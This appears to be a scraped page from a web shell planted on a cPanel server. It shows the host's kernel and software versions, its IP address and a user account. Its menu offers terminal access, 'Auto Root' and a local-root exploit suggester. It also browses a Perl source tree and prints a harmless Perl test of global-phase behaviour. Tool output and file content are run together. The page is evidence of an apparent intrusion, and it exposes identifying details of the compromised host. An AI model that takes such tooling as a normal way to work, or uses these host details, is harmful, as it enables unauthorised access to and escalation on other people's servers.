Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
t /
opbasic /
Delete
Unzip
Name
Size
Permission
Date
Action
arith.t
18.11
KB
-r--r--r--
2014-12-27 11:49
cmp.t
8.55
KB
-r--r--r--
2014-12-27 11:49
concat.t
4.21
KB
-r--r--r--
2014-12-27 11:49
magic_phase.t
881
B
-r--r--r--
2014-12-27 11:49
qq.t
1.92
KB
-r--r--r--
2014-12-27 11:49
Save
Rename
#!./perl use strict; use warnings; # Test ${^GLOBAL_PHASE} # # Test::More, t/test.pl, etc., assert plans in END, which happens before global # destruction. We do not want to use those programs/libraries here, so we # place this file in directory t/opbasic. BEGIN { print "1..7\n" } sub ok ($$) { print "not " if !$_[0]; print "ok"; print " - $_[1]" if defined $_[1]; print "\n"; } BEGIN { ok ${^GLOBAL_PHASE} eq 'START', 'START'; } CHECK { ok ${^GLOBAL_PHASE} eq 'CHECK', 'CHECK'; } INIT { ok ${^GLOBAL_PHASE} eq 'INIT', 'INIT'; } ok ${^GLOBAL_PHASE} eq 'RUN', 'RUN'; sub Moo::DESTROY { ok ${^GLOBAL_PHASE} eq 'RUN', 'DESTROY is run-time too, usually'; } my $tiger = bless {}, Moo::; sub Kooh::DESTROY { ok ${^GLOBAL_PHASE} eq 'DESTRUCT', 'DESTRUCT'; } our $affe = bless {}, Kooh::; END { ok ${^GLOBAL_PHASE} eq 'END', 'END'; }